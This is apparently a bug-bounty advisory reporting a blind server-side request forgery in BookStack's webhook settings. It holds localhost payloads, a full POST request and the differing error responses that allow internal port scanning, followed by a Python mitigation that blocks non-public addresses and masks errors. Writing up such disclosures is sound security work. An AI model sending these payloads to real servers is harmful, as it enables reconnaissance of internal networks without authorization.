History: Jul 27, 2023 - 1:14 p.m.

Server Side Request Forgery (SSRF)

2023-07-27 13:14:08
scgajge12
www.huntr.dev
8
ssrf
webhook
port scanning

EPSS

0.001

Percentile

23.9%

Description

The Webhook function can be made to access the local environment.
Because the resulting error message differs for open and closed ports, this blind SSRF makes it possible to port-scan the local environment.

Proof of Concept

After logging in, open the webhook settings page, enter a URL following the pattern below, and confirm from the difference in the error messages that the local environment was reached.

Payload

Open Port

http://localhost:80

Closed Port

http://localhost:1234

Request

POST /settings/webhooks/create HTTP/2
Host: demo.bookstackapp.com
 ...

_token=6AoIWKtSMXumoIqe2YyXsDREcraLVqwaIjf8VEV0&active=true&name=a&endpoint=http%3A%2F%2Flocalhost%3A1234%2F&timeout=20&events%5B%5D=all

Response Result (Error Message)

Open Port

Response status from endpoint was 405

Closed Port

cURL error 7: Failed to connect to localhost port 1234 after 0 ms: Connection refused (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for http://localhost:1234/
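The two responses above differ only because the webhook fetcher reports the transport outcome verbatim and places no restriction on where the endpoint may point. The following is an added mitigation example (not BookStack's own code): it resolves the configured endpoint and rejects any that maps to loopback, private or other non-public addresses, and it collapses delivery failures into one user-facing message so open and closed ports are indistinguishable. The hostnames and addresses in the fake resolver are constructed for the demo.

```python
import ipaddress
import logging
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
GENERIC_FAILURE = "Webhook delivery failed"

def _resolve(host):
    """Default resolver: every address (A and AAAA) the host currently maps to."""
    return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}

def make_fake_resolver(table):
    """Offline stand-in for _resolve; unknown names fail like a real DNS miss."""
    def lookup(host):
        if host not in table:
            raise socket.gaierror(f"constructed lookup failure for {host}")
        return table[host]
    return lookup

def _is_public(addr):
    """True only outside loopback, private, link-local and other special ranges."""
    ip = ipaddress.ip_address(addr)
    # ::ffff:127.0.0.1 is IPv4 loopback in IPv6 form; judge the embedded IPv4.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def webhook_url_allowed(url, resolve=_resolve):
    """Accept an endpoint only if it is http(s) and every resolved address is public."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        addrs = {str(ipaddress.ip_address(parts.hostname))}  # literal IP, no DNS needed
    except ValueError:
        try:
            addrs = set(resolve(parts.hostname))  # DNS name: check *all* records
        except OSError:
            return False  # unresolvable names are rejected outright
    # Caveat: a name can change between this check and the real request (DNS rebinding);
    # the HTTP client should pin the validated address or re-check at connect time.
    return bool(addrs) and all(_is_public(a) for a in addrs)

def user_facing_error(raw_detail, log=logging.getLogger("webhooks")):
    """Keep the transport detail (405 vs. connection refused) in the server log only."""
    log.warning("webhook delivery failed: %s", raw_detail)
    return GENERIC_FAILURE
```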

PoC Video

https://drive.google.com/file/d/1SM3HwCulnW_09L8FYo6V4wWc4tx95rYC/view?usp=drive_link
